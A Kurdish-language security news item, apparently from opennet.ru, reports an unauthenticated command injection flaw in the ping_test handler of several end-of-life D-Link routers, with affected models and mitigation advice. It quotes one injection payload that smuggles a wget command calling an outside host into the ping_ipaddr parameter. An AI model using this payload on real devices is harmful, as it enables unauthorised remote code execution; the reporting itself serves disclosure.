Di rêgezên wireless yên D-Link de lawazbûna xeternak (), ku destûrê dide te ku hûn ji dûr ve kodê li kêleka cîhazê bi şandina daxwazek taybetî ji hilgirê "ping_test" re, ku bêyî pejirandinê tê gihîştin, bicîh bikin.
Balkêş e, li gorî pêşdebirên firmware, banga "ping_test" divê tenê piştî pejirandinê were darve kirin, lê di rastiyê de ew di her rewşê de tê gotin, bêyî ku têketina navgîniya malperê. Bi taybetî, dema ku xwe bigihînin skrîpta application_sec.cgi û derbaskirina parametreya "action=ping_test", skrîpt ber bi rûpela erêkirinê ve vedigere, lê di heman demê de çalakiya ku bi ping_test re têkildar e pêk tîne. Ji bo cîbicîkirina kodê, di ping_test bixwe de qelsiyek din hate bikar anîn, ku bêyî rastkirina rastdariya navnîşana IP-ya ku ji bo ceribandinê hatî şandin gazî amûra ping dike. Mînakî, ji bo gazîkirina amûra wget û veguheztina encamên fermana "echo 1234" ji mêvandarek derveyî re, tenê pîvana "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20" destnîşan bikin. test.test/?$( echo 1234)".
Hebûna qelsbûnê di modelên jêrîn de bi fermî hate pejirandin:
- DIR-655 bi firmware 3.02b05 an kevntir;
- DIR-866L bi firmware 1.03b04 an kevntir;
- DIR-1565 bi firmware 1.01 an kevntir;
- DIR-652 (tu agahî der barê guhertoyên firmware yên bi pirsgirêk nayên peyda kirin)
Demjimêra piştgiriyê ji bo van modelan jixwe qediyaye, ji ber vê yekê D-Link , ku dê ji wan re nûvekirinan dernekeve da ku qelsiyê ji holê rake, karanîna wan pêşniyar nake û şîret dike ku wan bi cîhazên nû veguhezînin. Wekî çareseriyek ewlehiyê, hûn dikarin gihîştina navgîniya malperê tenê bi navnîşanên IP-ya pêbawer sînordar bikin.
Dûvre hat dîtin ku mexdûriyet jî heye modelên DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 û DIR-825, planên ji bo berdana nûvekirinên ku hêj nayên zanîn.
Source: opennet.ru